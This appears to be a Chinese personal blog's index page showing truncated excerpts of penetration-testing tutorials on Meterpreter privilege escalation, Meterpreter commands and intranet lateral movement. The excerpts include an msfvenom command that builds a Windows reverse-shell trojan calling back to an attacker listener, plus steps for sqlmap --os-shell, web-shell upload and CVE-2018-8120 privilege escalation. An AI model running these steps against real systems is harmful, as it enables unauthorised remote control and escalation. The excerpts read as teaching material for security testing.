刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

Meterpreter提权详解

0x01 Meterpreter自动提权1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为:windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为4444,

Meterpreter命令详解

0x01初识Meterpreter1.1.什么是Meterpreter  Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远

内网渗透之横向渗透

前言在一次测试中发现某系统存在SQL注入漏洞。且IIS可暴露绝对路径。使用--os-shell命令,填写绝对路径可执行系统命令。提权sqlmap在执行--os-shellI命令时向服务器写入了上传文件的脚本。通过文件上传可直接上传大马。简单执行几条系统命令查看该服务器基本情况。权限不够,上传cve-2018-8120.exe进行提权。cve-2018-8120.exe  "whoami"cve-2018-8120.exe  "

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.